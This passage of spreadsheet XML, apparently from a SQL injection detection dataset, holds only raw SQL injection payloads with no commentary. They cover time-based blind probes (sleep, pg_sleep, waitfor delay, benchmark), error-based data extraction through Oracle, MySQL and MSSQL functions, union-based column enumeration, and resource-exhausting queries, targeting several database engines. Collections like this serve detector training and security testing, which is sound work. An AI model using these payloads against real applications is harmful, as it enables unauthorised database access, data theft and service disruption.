    <t>1"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( "uncg" = "uncg</t>
  </si>
  <si>
    <t>1  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 6265 = 6265</t>
  </si>
  <si>
    <t>1'  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and 'efpc' like 'efpc</t>
  </si>
  <si>
    <t>-4797' union all select 8223,8223,8223,8223,8223,8223,8223,8223#</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 'nfix' = 'nfix</t>
  </si>
  <si>
    <t>-2211" or 2113 = 8885#</t>
  </si>
  <si>
    <t>1" )  and make_set ( 4553 = 8132,8132 )  and  ( "pfci" like "pfci</t>
  </si>
  <si>
    <t>-1157  )  )   as sxie where 7118 = 7118 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr</t>
  </si>
  <si>
    <t xml:space="preserve">-4746%"  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 </t>
  </si>
  <si>
    <t>1' )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>1'  )  )   as zffq where 9572 = 9572 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' )  as juxt where 5956 = 5956 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" )  as pkkx where 6716 = 6716 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  6977 = 6977</t>
  </si>
  <si>
    <t>-2951 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 )</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( "zzcd" = "zzcd</t>
  </si>
  <si>
    <t>-3731'  )  )   )  or elt ( 7540 = 1412,1412 )  and   (  (   ( 'iwch' = 'iwch</t>
  </si>
  <si>
    <t>1  )  )   as vycb where 3524 = 3524 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%'</t>
  </si>
  <si>
    <t>1'  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  'stqq' = 'stqq</t>
  </si>
  <si>
    <t>1'  )  )   and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1" where 8978 = 8978 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">-5898"  )  )   as fycd where 7135 = 7135 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( </t>
  </si>
  <si>
    <t>-4407" )  where 2055 = 2055 or elt ( 9714 = 5040,5040 ) --</t>
  </si>
  <si>
    <t>select * from generate_series ( 3341,3341,case when  ( 3341 = 3072 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' )  as uytv where 7875 = 7875 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1  )  )   as pjjz where 8384 = 8384 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'ccsb' = 'ccsb</t>
  </si>
  <si>
    <t>1"  )  )   as knyf where 8109 = 8109 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1"  )  )   as uqkn where 4642 = 4642 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' )  where 9226 = 9226 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' )  where 3330 = 3330 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  waitfor delay '0:0:5' and   (  (   ( "tuhy" like "tuhy</t>
  </si>
  <si>
    <t>-2625"  )  )   as qfuo where 1980 = 1980 union all select 1980,1980,1980--</t>
  </si>
  <si>
    <t>1' )  and elt ( 4249 = 4249,7259 )  and  ( 'ifca' like 'ifca</t>
  </si>
  <si>
    <t>1" )  as uyns where 4751 = 4751 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 'pfle' like 'pfle</t>
  </si>
  <si>
    <t>-8436' )  as frmf where 7225 = 7225 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>1' union all select null,null--</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "tepf" = "tepf</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null--</t>
  </si>
  <si>
    <t>1" )  where 2388 = 2388 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 'yctp' = 'yctp</t>
  </si>
  <si>
    <t>1 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  # pkcp</t>
  </si>
  <si>
    <t>1' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'hfxu' like 'hfxu</t>
  </si>
  <si>
    <t>select  ( case when  ( 3539 = 8768 )  then 3539 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-1011 or 7140 = 9977--</t>
  </si>
  <si>
    <t>-9263' )  as qodg where 6798 = 6798 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'luoj' = 'luoj</t>
  </si>
  <si>
    <t>1" )  where 9545 = 9545 and 9198 = 9198--</t>
  </si>
  <si>
    <t>-3359 union all select 4675,4675,4675--</t>
  </si>
  <si>
    <t>1%" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "%" = "</t>
  </si>
  <si>
    <t>1' )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( 'sgdj' like 'sgdj</t>
  </si>
  <si>
    <t>1'+ ( select 'yyyn' where 5395 = 5395</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1%"  )  )  </t>
  </si>
  <si>
    <t>1' where 6853 = 6853 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>-7793"  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( "lias" = "lias</t>
  </si>
  <si>
    <t>1 )  where 6082 = 6082 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>-3960"  )  )   union all select 7813,7813,7813,7813,7813,7813--</t>
  </si>
  <si>
    <t>1' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'jmub' = 'jmub</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and 'mlmu' = 'mlmu</t>
  </si>
  <si>
    <t>-5581%'  )  )   )  union all select 4266,4266,4266,4266,4266,4266,4266,4266,4266,4266#</t>
  </si>
  <si>
    <t>1' )  where 8835 = 8835 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'nazb' = 'nazb</t>
  </si>
  <si>
    <t>-6203'  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||ch</t>
  </si>
  <si>
    <t>-8274'  )  )   union all select 3048--</t>
  </si>
  <si>
    <t>1%" )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-1097" where 4421 = 4421 union all select 4421,4421,4421,4421,4421#</t>
  </si>
  <si>
    <t>1" where 7249 = 7249 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( "nwjv" = "nwjv</t>
  </si>
  <si>
    <t>-6341' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'ugys' = 'ugys</t>
  </si>
  <si>
    <t>select  ( case when  ( 2914 = 3335 )  then 2914 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-3437 )  union all select 7774,7774,7774--</t>
  </si>
  <si>
    <t>1'+ ( select uqdb where 3508 = 3508 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  rlike  ( select  ( case when  ( 2671 = 4485 )  then 1 else 0x28 end  )  )   and  ( 'ezco' like 'ezco</t>
  </si>
  <si>
    <t>1" or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'puco' where 2605 = 2605 union all select null#</t>
  </si>
  <si>
    <t>1' )  as gdie where 8133 = 8133 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>-8933 )  as iiyr where 1974 = 1974 union all select 1974,1974,1974,1974,1974#</t>
  </si>
  <si>
    <t>1" and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-9142%"  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +c</t>
  </si>
  <si>
    <t>1" )  where 2070 = 2070</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( 'vcgc' like 'vcgc</t>
  </si>
  <si>
    <t>1 where 9898 = 9898 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1' )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1" )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( "qpzj" like "qpzj</t>
  </si>
  <si>
    <t>1'|| ( select 'yags' where 6268 = 6268 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>1" where 5236 = 5236 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'gxgi' = 'gxgi</t>
  </si>
  <si>
    <t>-1643' where 1968 = 1968 or 3484 = 6642</t>
  </si>
  <si>
    <t>1" and  ( 1668 = 8054 ) *8054</t>
  </si>
  <si>
    <t xml:space="preserve"> end and 'hizd' = 'hizd</t>
  </si>
  <si>
    <t>-8633" or 5099 = 5974</t>
  </si>
  <si>
    <t>1'+ ( select bjav where 6923 = 6923 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1%"  )  )   procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1 )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 4557 = 4557</t>
  </si>
  <si>
    <t>1"  )  )   as spvl where 2242 = 2242 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>select * from generate_series ( 6414,6414,case when  ( 6414 = 6455 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1 )  where 3738 = 3738 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-8344 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +</t>
  </si>
  <si>
    <t>1  )  )   as jzzo where 7773 = 7773 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>-1748%"  )  )   )  union all select 2987#</t>
  </si>
  <si>
    <t>1"  )  )   waitfor delay '0:0:5' and   (  (  "koni" like "koni</t>
  </si>
  <si>
    <t>1  )  )   as qgok where 3993 = 3993 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">-2348 )  as sige where 1639 = 1639 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr </t>
  </si>
  <si>
    <t>1' )  as znak where 5203 = 5203</t>
  </si>
  <si>
    <t>1 )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( 1185 = 1185</t>
  </si>
  <si>
    <t>1%"  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>-8065"  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>1" )  where 4182 = 4182 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1 )  as iovi where 3910 = 3910 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'bmbt' = 'bmbt</t>
  </si>
  <si>
    <t>1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and 'vunt' = 'vunt</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1'  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  'rbhe' = 'rbhe</t>
  </si>
  <si>
    <t>1" )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( "xhqc" = "xhqc</t>
  </si>
  <si>
    <t>1%' )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "azmf" = "azmf</t>
  </si>
  <si>
    <t xml:space="preserve">-5830 )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 </t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and 'fgcg' = 'fgcg</t>
  </si>
  <si>
    <t>-3924'|| ( select 'ssld' from dual where 6229 = 6229 union all select 6229,6229,6229,6229,6229#</t>
  </si>
  <si>
    <t>1'+ ( select tnch where 1867 = 1867 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>-8355%"  )  )   )  union all select 3004,3004,3004,3004,3004,3004,3004--</t>
  </si>
  <si>
    <t>1' )  as gxpb where 7107 = 7107 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>-4518 where 8023 = 8023 or 6872 = 6872--</t>
  </si>
  <si>
    <t>-8258"  )  )   as swjp where 2681 = 2681 union all select 2681,2681,2681,2681,2681,2681--</t>
  </si>
  <si>
    <t>1"  )  )   as fmul where 7827 = 7827</t>
  </si>
  <si>
    <t>1' )  where 6248 = 6248 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1'+ ( select 'sacd' where 5984 = 5984 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" where 8483 = 8483 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" where 9241 = 9241 union all select null#</t>
  </si>
  <si>
    <t>-7395%" order by 1--</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( 'fwok' like 'fwok</t>
  </si>
  <si>
    <t>1%"  )  )   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-5054%"  )  )   )  union all select 8263,8263,8263,8263--</t>
  </si>
  <si>
    <t>-6457 where 1764 = 1764 union all select 1764,1764,1764,1764,1764,1764,1764,1764--</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and  ( 'pwpc' = 'pwpc</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 7036 = 2370,1,1/0 ) </t>
  </si>
  <si>
    <t>-4330' union all select 3059,3059,3059,3059,3059,3059,3059,3059,3059--</t>
  </si>
  <si>
    <t>-2817%' )  or 8255 = 3841--</t>
  </si>
  <si>
    <t>1%"  )  )   and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-8353'  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>1'  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  'glfq' like 'glfq</t>
  </si>
  <si>
    <t>1'+ ( select 'wkbg' where 3921 = 3921 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'</t>
  </si>
  <si>
    <t>-2500'  )  )   )  union all select 6853,6853,6853,6853--</t>
  </si>
  <si>
    <t>1" )  where 9656 = 9656 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   order by 1--</t>
  </si>
  <si>
    <t>-8521'+ ( select ucim where 9003 = 9003 union all select 9003--</t>
  </si>
  <si>
    <t>-2959" union all select 3414,3414,3414,3414,3414,3414,3414,3414#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-7234" )  union all select 3154,3154,3154,3154#</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>-7248" )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'onmp' = 'onmp</t>
  </si>
  <si>
    <t>1 )  waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>select  ( case when  ( 3168 = 5577 )  then 3168 else 3168* ( select 3168 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "ksxz" = "ksxz</t>
  </si>
  <si>
    <t>1  )  )   as myxo where 1759 = 1759 union all select null#</t>
  </si>
  <si>
    <t>1' )  where 2802 = 2802 union all select null,null,null#</t>
  </si>
  <si>
    <t>1' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'ukzb' = 'ukzb</t>
  </si>
  <si>
    <t>1 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) -- viti</t>
  </si>
  <si>
    <t>-7084%' union all select 5727,5727,5727,5727,5727,5727,5727,5727,5727,5727--</t>
  </si>
  <si>
    <t>1"  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "fktl" = "fktl</t>
  </si>
  <si>
    <t>-5755" or 3581 = 7566</t>
  </si>
  <si>
    <t>-9569%'  )  )   union all select 8405,8405,8405,8405--</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' ) ||'</t>
  </si>
  <si>
    <t>1  )  )   as qlkf where 6635 = 6635</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( "ytju" like "ytju</t>
  </si>
  <si>
